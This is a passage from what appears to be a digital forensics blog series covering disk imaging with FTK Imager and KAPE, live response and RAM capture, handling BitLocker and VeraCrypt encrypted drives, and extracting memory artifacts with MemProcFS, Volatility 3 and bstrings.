step-by-step guide for FTK Imager-based imaging is available in a detailed PDF document on my website. You can download it from the Resume section under the document name "FTK Imager Based Imaging" . Acquisition Using KAPE K APE (Kroll Artifact Parser and Extractor) is a rapid forensic triage tool that can collect targeted artifacts from a live system or forensic image . Unlike FTK Imager, which captures everything, KAPE focuses on extracting critical forensic artifacts such as: Event logs Registry hives Browser history User activity logs https://www.cyberengage.org/courses-1/kape-unleashed%3A-harnessing-power-in-incident-response KAPE is also useful for remote forensic collection, making it highly efficient for Incident Response (IR) cases. You can find my complete article on KAPE acquisition, analysis, and IR cases on my website, which includes detailed screenshots. Triage vs. Full Imaging: When to Use What? A key forensic question is whether to triage first or perform a full disk image before analysis. The decision depends on time constraints and urgency . If time is not an issue , creating a full forensic image first is the best practice. This ensures every piece of data is preserved for in-depth analysis. If speed is critical , such as in incident response cases, triaging first with KAPE allows investigators to gather key forensic artifacts quickly. A balanced approach involves first running KAPE for rapid data collection and then starting full disk imaging with FTK Imager. This way, analysis can begin while the full image is still being created. How to Balance Speed and Completeness? Use a write blocker when dealing with original media to prevent accidental modifications. Run KAPE first to quickly extract key forensic data (~1% of the total data that is most relevant to investigations). Start full imaging with FTK Imager while simultaneously analyzing the KAPE-collected data. By the time imaging is complete , investigators may already have leads from the extracted artifacts. This win-win approach ensures rapid initial analysis while maintaining forensic integrity. Final Thoughts Both FTK Imager and KAPE are invaluable forensic tools. FTK Imager provides a complete forensic image, while KAPE allows for fast triage and targeted artifact collection. The right tool depends on the specific case, but combining both strategically helps investigators work efficiently without compromising forensic standards. For a detailed walkthrough of these processes, check out my full documentation on FTK Imager and KAPE on my website! ----------------------------------------------Dean--------------------------------------------
- Disk Imaging (Part 1) : Memory Acquisition & Encryption Checking
Imagine you need to make a perfect copy of everything on a hard drive—not just the files you see, but also hidden system data, partitions, and even deleted files that might still be recoverable. This is where disk imaging comes in! Whether you’re working in digital forensics, IT, or just want to back up your system. Disk imaging is important What is Disk Imaging? Disk imaging is the process of creating an exact, bit-for-bit copy of a storage device (like a hard drive or SSD) and saving it as a file. Think of it as taking a snapshot of your entire drive , capturing everything from active files to hidden system data. This is different from just copying files, as it preserves the structure and details of the original disk. However, in some cases, creating an exact duplicate isn’t always possible. SSDs (Solid-State Drives) may not allow precise duplication due to how they handle data storage. Bad sectors (damaged parts of a hard drive) might prevent some data from being copied, leaving gaps in the image file. How Does Disk Imaging Work? The disk imaging process involves three key components: The Source Drive – This is the drive you want to copy. A Write Blocker – A tool that prevents any accidental changes to the source drive while imaging. Imaging Software – The program that reads the source drive and creates an image file. Choosing the Right Image Format When creating a disk image, you’ll typically save it in one of two formats: E01 (Expert Witness Format) – The most popular choice because it includes compression, making the file smaller while keeping all the data intact. DD (RAW format) – A bit-for-bit copy with no compression, meaning it takes up more space but remains a direct replica. Some of the most widely used disk imaging tools include: FTK Imager X-Ways Imager Guymager DD (a classic command-line tool) Steps to Create a Disk Image Connect the source drive to your computer using a write blocker. Start the imaging software and select the source drive. Choose a destination location where the image file will be saved. Select the format (E01 or DD) based on your needs. Start the imaging process and wait for completion. Once finished, most imaging software (except DD) generates a log file. This report contains: Drive details (size, sector count, etc.) A hash value (used to verify data integrity) Any errors, such as unreadable sectors Hardware vs. Software Imaging While the above method uses s oftware-based imaging (requiring a computer and write blocker), another option is hardware-based imaging . Hardware Imaging Devices A hardware imager is a standalone device that combines the functions of a computer, write blocker, and imaging software in one unit. These devices: Are faster and more efficient for large-scale imaging Minimize errors and risks of accidental modifications Can save images to another hard drive or even a network location (if supported) However, be careful not to mix up the source and destination drives! Formatting the wrong drive could lead to irreversible data loss. How Long Does Imaging Take? Disk imaging can take several hours, depending on: The size of the drive How much data is stored on it The speed of the connection (USB, SATA, or network transfer) While waiting, many forensic analysts take advantage of this time to review key data (a process called rapid triage ) , helping to identify important leads before the full image is ready. Live vs. Dead Imaging: What’s the Difference? Live Imaging – Done while the system is still running. This is useful when you need to capture volatile data like running processes, open network connections, or system logs. Dead Imaging – Performed after powering down the system. This is the traditional approach and is often used for full disk acquisitions. Why Live Imaging Matters A running system provides valuable forensic insights, such as: What applications are currently running Connected external devices (USBs, external drives, etc.) Potential signs of tampering or malicious activity If the system is off, you won’t get this real-time data. But if it's on, documenting its current state before imaging is crucial. Old vs. Modern Forensic Acquisition Methods In the past, forensic specialists followed a “dead box” approach , where the computer was shut down before data collection. This was because: RAM (temporary memory) was small and not often considered valuable. Encryption was rare, making it easy to access data even after shutting down. However, today’s machines often use encryption and security measures like TPM (Trusted Platform Module) , making live imaging more important than ever. If you shut down an encrypted device, the data could be permanently locked. How Were Systems Handled in the Past? If it was a regular computer (not a server), forensics experts would unplug it directly. If it was a server, they would shut it down properly to avoid issues with RAID configurations or system failures. -------------------------------------------------------------------------------------------------------- Live Response When dealing with a running system , the way you collect data can significantly impact an investigation . Unlike a powered-off system, where everything is static, a running machine holds volatile data that can be lost if not captured correctly. Live response is the process of collecting critical data from a system that is still powered on. This includes memory (RAM), active processes, network connections, and encryption states. U Step 1: Document the System’s Status Before interacting with the machine, it’s essential to document everything : What’s displayed on the screen? Are any applications open? Are there external devices connected? Is the system asleep or in hibernation mode? Many computers may appear off when they are just in sleep mode . A simple press of the spacebar or mouse movement can wake them up. Also, check for indicator lights on the computer case—these can show that the system is still running. Step 2: Determine the Order of Volatility Volatile data disappears quickly once the system is shut down. This means you need to collect the most fragile information first. The order of volatility in a forensic investigation is as follows: Dump Memory (RAM) – This contains running programs, network sessions, user activity, passwords, and even malware that only exists in memory. Check for Encryption – If encryption is present, shutting down the system could permanently lock the data. Perform Triage Collection – Extract key artifacts from the live system for quick analysis while the full forensic image is created. Step 3: Dump Memory (RAM) RAM is one of the richest sources of forensic data , but also the most fragile . I f the computer is turned off before capturing RAM, this data is gone forever. 💡 What can be found in RAM? Running processes Open files and directories Network connections Chat conversations Encryption keys Malware that exists only in memory How to Capture RAM? There are several tools available for memory acquisition, with Windows systems having more options than Macs . Before starting, ensure the system is disconnected from all networks (Ethernet and Wi-Fi) to prevent remote interference. To capture RAM: ✅ Use a USB drive or external SSD with forensic tools installed ✅ Store the memory dump on a fast external drive to speed up the process ✅ Use specialized tools like Volatility to analyze memory contents later Important Considerations: Mac computers are more difficult to analyze due to fewer available tools. Laptops should be plugged in to prevent power loss during acquisition. Be careful with encryption keys —they often exist in RAM and can be retrieved before shutdown. Step 4: Check for Encryption Encryption can be a major roadblock if not handled properly. Many modern computers use full-disk encryption with tools like: BitLocker (Windows) VeraCrypt PGP Encryption If the system is still running, the encrypted data is often accessible. The best approach is to create a logical volume image while the machine is still running. This ensures that decrypted data is preserved. 💡 If encryption is present: ✔️ Image the drive before shutting down ✔️ Extract encryption keys from memory (if possible) ✔️ If no encryption is detected, proceed with normal disk imaging Step 5: Perform Triage Collection While waiting for full disk imaging to complete, triage collection can provide fast insights. Using tools like KAPE , forensic examiners can extract: Browser history User activity logs Recently opened files System logs This allows investigators to identify leads early without waiting hours for a complete forensic image. Step 6: The Reality of Live Data Collection Interacting with a running system always leaves some trace. The key is to minimize changes and document everything. 💡 Common mistakes: Shutting the system down too early and losing RAM data Forgetting to disable network access , allowing remote tampering Using slow USB drives that take too long to capture memory Why RAM Collection Matters More Than Ever With modern encryption and cloud-based applications, RAM is now more valuable than ever in forensic investigations. Unlike 15 years ago, when most data was stored on hard drives, today’s machines: ✔️ Have 8GB, 16GB, or even 32GB of RAM (containing a huge amount of data) ✔️ Store passwords, decryption keys, and session data in memory ✔️ Run software that only exists in RAM (fileless malware) Step 7: Storage and Transfer of Memory Dumps Since memory dumps can be large, choosing the right storage device is critical. A solid-state external hard drive is the best choice due to high-speed data transfer . Final Step: Document Everything! Since live response actively changes system data , it’s crucial to: 📌 Take photos or videos of each step 📌 Write detailed notes on what actions were taken 📌 Record timestamps for each forensic operation -------------------------------------------------------------------------------------------------------- Live Response Tools When performing live forensics on a running system, one of the biggest challenges is introducing your tools without altering or corrupting evidence . While it may seem simple—just plug in a USB drive and start collecting data—there are several critical factors to consider. Key Questions to Ask Before Deploying Live Response Tools Before introducing any tools into a system, ask yourself: ✅ How much space will I need? (Memory dumps and disk images can be large.) ✅ How should my external drive be formatted? (NTFS for Windows, exFAT for cross-compatibility.) ✅ What resources are available? (Are USB ports, network storage, or optical drives an option?) ✅ Can I trust the software already on the target system? (Always bring your own trusted binaries.) ✅ Are there any environmental restrictions? (Some locations, such as government facilities, may restrict USB devices.) ✅ Do I have a backup plan? (If my primary tool fails, do I have an alternative?) Choosing the Right External Storage Since live forensics often involves capturing large amounts of data (such as RAM dumps or forensic images), using a high-quality external storage device is crucial. 💡 Best Practices for External Storage Devices: ✔️ Use a large-capacity, high-quality external SSD for faster read/write speeds. ✔️ Format the drive as NTFS for Windows systems or exFAT for cross-platform compatibility. ✔️ Always document the details of the device before use. Tracking USB Devices with NirSoft USBDeview To maintain a proper chain of custody, document the details of your external storage using a tool like NirSoft USBDeview . This allows you to: Record the make, model, and serial number of your USB device. Include this information in your forensic reports for future reference. Where Should You Store Collected Data? One of the biggest logistical challenges in live response is deciding where to store the collected data . This depends on: The size of the storage device you’re imaging. The amount of memory on the system. The number of devices you need to process. Storage Recommendations: ✅ External SSDs – The preferred option, but always bring more space than you think you’ll need. I f you estimate needing 1TB , bring 4TB —unexpected extra data is common! ✅ Network Storage (Less Optimal) – If an external drive isn’t an option, a network share may work, but consider security risks (who else has access?). ✅ Chain of Custody Considerations – Keep strict control over the storage device to prevent tampering or unauthorized access . Selecting the Right Live Response Tools Once you have a storage device ready, the next step is choosing and deploying the right tools for live response. Your toolkit should include: 🔹 Memory collection tools (e.g., DumpIt, Belkasoft RAM Capturer, FTK Imager) Command Line vs. GUI Tools When performing live forensics, minimizing system impact is critical . Using command-line (CLI) tools instead of graphical user interface (GUI) tools can help: ✔️ Reduce memory usage ✔️ Minimize system modifications ✔️ Prevent unnecessary process execution Top Memory Collection Tools for Live Forensics 1. DumpIt (by Comae Technologies) Pros: ✅ Simple command-line tool with minimal system impact ✅ Can be executed without additional arguments for quick memory dumps ✅ Allows file compression to save space Cons: ❌ Compressed files may not be compatible with all memory analysis tools 💡 Usage: To capture memory using DumpIt, simply execute: DumpIt /OUTPUT If run without arguments, DumpIt will prompt for confirmation before proceeding. The collected memory file will automatically be named with the machine name and timestamp. 2. Belkasoft RAM Capturer Pros: ✅ Minimal GUI interface , reducing system modifications ✅ Uses kernel mode driver to bypass anti-forensic techniques ✅ Available in 32-bit and 64-bit versions to minimize unnecessary code execution Cons: ❌ Requires administrator privileges 💡 Usage: Launch Belkasoft RAM Capturer . Select an output folder for the memory dump. Click “Capture!” to start memory acquisition. 3. FTK Imager Pros: ✅ Well-known forensic tool with wide industry adoption ✅ Can capture both memory and full disk images ✅ Provides verification logs for integrity checks Cons: ❌ Older versions (pre-3.0.0) operate in user mode , which may limit access to certain memory areas ❌ May not detect advanced malware hiding in kernel memory 💡 Important Note: If using FTK Imager, update to version 3.0.0 or later to ensure kernel-level access to all memory areas. Final Considerations: Ensuring a Secure and Effective Live Response 🔹 Plan ahead – Know the environment and what resources are available. 🔹 Minimize system impact – Use command-line tools whenever possible. 🔹 Document everything – Keep detailed records of every action taken. 🔹 Secure collected data – Store forensic images and memory dumps on encrypted, controlled-access storage. 🔹 Always have a backup plan – If one tool fails, be ready with an alternative. -------------------------------------------------------------------------------------------------------- Handling Encrypted Drives Encryption presents a major challenge in digital forensics. While forensic imaging techniques typically allow investigators to access data on a storage device, encryption software like BitLocker, VeraCrypt, and PGP can make this data completely inaccessible without the proper decryption key . What Happens When a Drive is Encrypted? If encryption is enabled, imaging the physical volume (even with a write blocker) only captures the encrypted data , which is useless without the decryption key. This is especially problematic if the device is turned off because, in many cases, powering down the system can permanently lock the data . 💡 Key Takeaways: ✔️ If encryption is detected, do NOT shut down the system before performing a live capture. ✔️ If the system is running, logical imaging may allow access to decrypted data. ✔️ Failing to check for encryption before imaging can result in lost evidence. How to Detect Encryption on a Running System To determine whether a system is using encryption, forensic analysts use specialized tools that can scan for encryption signatures . One such tool is Encrypted Disk Detector (EDD) from Magnet Forensics. 🔍 Using EDD to Identify Encrypted Volumes EDD is a command-line tool that checks local physical drives for encryption software, including: BitLocker (Windows) VeraCrypt & TrueCrypt PGP® (Pretty Good Privacy) Checkpoint, Sophos, and Symantec encrypted volumes 💡 How EDD Works I have created an complete article on EDD (Do check it out you will learn how to use the tool https://www.cyberengage.org/post/exploring-magnet-encrypted-disk-detector-eddv310 EDD does not locate encrypted container files that are not mounted, but other forensic tools can assist with that. Handling VeraCrypt and TrueCrypt Encryption VeraCrypt is the successor to TrueCrypt , and both function similarly: 🔹 Users create an encrypted container that appears as a mounted drive. 🔹 Files stored inside are inaccessible without a password or keyfile . 🔹 A hidden partition can be created within the primary encrypted volume. Detecting VeraCrypt/TrueCrypt Artifacts If a container is currently mounted , EDD will detect and flag it . However, once unmounted, traces of its existence may be deleted from the system . 💡 Registry Analysis for VeraCrypt/TrueCrypt Older versions of these tools left traces in the Windows Registry under: HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices Older versions left artifacts even after unmounting . Newer versions delete traces after unmounting (though remnants may still exist). Pro Tip: Finding Encrypted Containers Since encrypted containers store a large amount of data, they tend to be some of the biggest files on the system . You can identify them by: ✅ Scanning for large, unexplained files on the system. ✅ Ignoring system files like pagefile.sys and hiberfil.sys. ✅ Checking recently accessed files for unusual activity. BitLocker Encryption: Challenges & Solutions BitLocker is Microsoft’s built-in encryption tool, included with Windows Enterprise, Pro, and Ultimate editions. 💡 How BitLocker Works: ✔️ Uses AES encryption (128-bit or 256-bit) . ✔️ Can be enabled via Group Policy (common in corporate environments). ✔️ Requires a password, PIN, or recovery key to unlock data. The Biggest Forensic Challenge with BitLocker If a BitLocker-encrypted drive is removed from the original computer , the data is completely inaccessible without the recovery key . However, if the system is still running , forensic analysts can bypass encryption and extract data while it remains unlocked . Two Ways to Handle BitLocker-Protected Drives 🔹 Option 1: Live Logical Imaging If the system is running, image the logical drive instead of the physical disk . This ensures you capture decrypted data. 🔹 Option 2: Recover BitLocker Keys BitLocker requires users to save a recovery key to a separate drive or print it. In corporate settings, IT administrators may have stored recovery keys via Group Policy. Best Practices for Handling Encrypted Systems 🔹 Always check for encryption before shutting down the system. 🔹 If encryption is detected, prioritize live imaging. 🔹 Use tools like EDD to scan for encryption software. 🔹 Look for large container files if encryption is suspected. 🔹 Consult Group Policy settings for corporate BitLocker deployments. -------------------------------------------------------------------------------------------------------- Wrapping Up Digital forensic acquisition is as much about strategy and preparation as it is about technical execution. Whether capturing volatile memory, imaging a disk, or handling encrypted data, the right approach can mean the difference between retrieving crucial evidence or losing it forever . By following best practices, using trusted tools, and adapting to evolving challenges, forensic investigators can ensure data integrity, accuracy, and reliability in every case they handle. 🚀 ---------------------------------------------Dean-------------------------------------------
- Extracting Memory Objects with MemProcFS/Volatility3/Bstrings: A Practical Guide
---------------------------------------------------------------------------------------------------- I have already article related to MemProcFS, Bstring, Voaltility3 in depth, Do check those out to learn tool in depth! Link below https://www.cyberengage.org/post/memprocfs-memprocfs-analyzer-comprehensive-analysis-guide Volatility 3 https://www.cyberengage.org/post/step-by-step-guide-to-uncovering-threats-with-volatility-a-beginner-s-memory-forensics-walkthrough Strings/Bstrings https://www.cyberengage.org/post/memory-forensics-using-strings-and-bstrings-a-comprehensive-guide ---------------------------------------------------------------------------------------------------- Today we will discuss kind a comparison lets get started ------------------------------------------------------------------------------------------------------------ When analyzing a system’s memory, you’re often looking for key artifacts like suspicious processes, DLLs, drivers, or even cached files. These could be crucial for forensic investigations, malware analysis, or troubleshooting. With MemProcFS, extracting these objects becomes incredibly simple—just like browsing files in a regular folder ------------------------------------------------------------------------------------------------------------ MemProcFS Why Extract Memory Objects? Think of RAM as a goldmine of real-time data. Anything that has happened on a system—running programs, opened documents, registry changes, and even deleted files—can still be floating around in memory. If you know where to look, you can extract critical pieces of evidence, such as: Running processes and their memory sections Loaded DLLs and executables Cached documents and registry hives The NTFS Master File Table (which contains a list of all files on disk) Active Windows services With MemProcFS, all of these objects can be accessed like regular files, making extraction quick and hassle-free. ------------------------------------------------------------------------------------------------------------ Navigating Memory Objects in MemProcFS MemProcFS organizes memory data in a virtual folder structure, making it intuitive to browse and extract files. Here’s how you can locate key objects: Processes and Memory Sections You can find process-related data under: M:\name\powershell.exe-5352\ (organized by process name) M:\pid\7164\ (organized by process ID) These folders contain everything from heaps and memory dumps to loaded DLLs. DLLs and Executables The modules folder holds DLLs and executables loaded into memory. Each DLL or executable is stored as pefile.dll, allowing you to extract and analyze it. Tracking Memory Sections The vmemd folder helps you track specific memory regions linked to suspicious activities. The heaps folder is useful for f inding private memory allocations, where processes store sensitive data. The minidump folder provides a snapshot of process memory, including both code and data. Drivers and System Modules Most kernel drivers can be found under the System process folder (M:\pid\4\modules\). Some graphics drivers (Win32k) reside in the CSRSS.exe process, though they’re rarely useful for most investigations. ------------------------------------------------------------------------------------------------------------ Extracting and Analyzing Memory Objects MemProcFS makes extraction as simple as copying a file. You can: Open memory sections in a hex editor for low-level analysis. Extract strings from executables to identify potential malware behavior. Upload a suspicious DLL or EXE to VirusTotal for threat intelligence. Open DLLs in a disassembler to inspect their functionality. Run an antivirus scan —though it’s best to copy the file first, as security tools may quarantine it. Pro Tip: If a tool fails to open a virtual file, try copying it to a local folder first. ------------------------------------------------------------------------------------------------------------ Handling Terminated Processes Not seeing a process under M:\name or M:\pid? It might have exited before you started your analysis. By default, MemProcFS doesn’t display terminated processes since their memory can be incomplete or corrupted. However, you can enable this feature by modifying: M:/config/config_process_show_terminated.txt Change the value to 1, and MemProcFS will attempt to reconstruct folders for terminated processes. ------------------------------------------------------------------------------------------------------------ Volatility3 You might be wondering why the dedicated dumping plugins disappeared in Volatility 3. The truth is—they haven't! The functionality is still there; it's just been integrated into the standard plugins with an additional --dump option. Key Changes in Volatility 3 The --dump option: If a plugin supports dumping memory objects, you'll see this option in the plugin help. Output folder (-o) parameter: This replaces Volatility 2’s --dump-dir= and is crucial when extracting drivers, DLLs, and other artifacts to keep things organized. Parameter Order Matters: Unlike Volatility 2, where things were more flexible , Volatility 3 requires -o to come before the plugin, while plugin-specific options like --pid and --dump come after . Extracting Executables To extract suspicious processes from memory, use the windows.pslist --dump plugin. By default, it dumps all processes in the EPROCESS list, but you can narrow it down using --pid. Commands: python3 vol.py -f memory.img -o output-folder windows.pslist --dump For terminated or unlinked processes, use windows.psscan --dump, which replaces the old procdump plugin in Volatility 2. Extracting DLLs If you need to pull DLLs from memory, windows.dlllist --dump is your go-to plugin. It extracts all DLLs by default, but filtering by --pid is a good practice to avoid unnecessary files. Commands: python3 vol.py -f memory.img -o output-folder windows.dlllist --pid 1040 --dump The equivalent Volatility 2 plugin was dlldump. Extracting Drivers When analyzing potentially malicious drivers, use windows.modules --dump. If you need to go deeper and retrieve unloaded or unlinked drivers, windows.modscan --dump is the way to go. Commands: python3 vol.py -f memory.img -o output-folder windows.modules --dump In Volatility 2, this was handled by moddump. Important Notes: No Guarantees on Data Availability: Some memory objects might be paged out, making extraction incomplete. Including Page Files Helps: If possible, analyze the page file to recover missing artifacts. Process Memory Extraction Dumping process memory is trickier than extracting files. Process memory contains both code (executable sections) and data (buffers, command-line inputs, PowerShell scripts, etc.). Tools for Dumping Process Memory: windows.pslist --dump: Extracts executable code, similar to Volatility 2’s procdump. windows.memmap --dump: Dumps all memory-resident pages, capturing both code and data (like Volatility 2’s memdump). MemProcFS: Creates a pefile.dll representing the executable part of a process and a minidump.dmp file containing key process memory sections. ------------------------------------------------------------------------------------------------------------ Strings/Bstrings Searching for Artifacts in Memory Dumps One of the most effective forensic techniques is string searching , which helps identify artifacts like IP addresses, domains, malware commands, and user credentials. Here’s how to do it: Using strings (Linux) strings -a -t d memory.img > strings.txt strings -a -t d -e l memory.img >> strings.txt sort strings.txt > sorted_strings.txt Using grep (for targeted searches) grep -i "search_term" sorted_strings.txt Using bstrings.exe (Windows/Linux) Eric Zimmerman's bstrings is a great alternative that extracts ASCII and Unicode strings simultaneously and even performs initial searches. Commands: bstrings -f memory.img -m 8 # Extracts strings of length 8+ bstrings -f memory.img --ls search_term # Searches for a specific term bstrings -f memory.img --lr ipv4 (use a regex to find IP version 4 addresses) ------------------------------------------------------------------------------------------------------------ MemProcFS vs. Volatility While MemProcFS makes memory analysis incredibly convenient, it’s not a one-size-fits-all solution. Volatility is another powerful tool that provides more in-depth forensic capabilities, such as: Advanced memory carving techniques More detailed malware analysis Reconstruction of deleted or hidden processes For best results, combine both tools—use MemProcFS for quick and easy extraction, and Volatility for deeper analysis. ------------------------------------------------------------------------------------------------------------ Wrapping Up Memory forensics can be overwhelming, but tools like MemProcFS simplify the process. By treating memory like a file system, it allows you to quickly extract key artifacts, analyze suspicious activity, and uncover critical forensic evidence. Whether you’re investigating malware, troubleshooting system crashes, or performing digital forensics, MemProcFS gives you the power to dig deep into memory with ease. ---------------------------------------------Dean----------------------------------------------






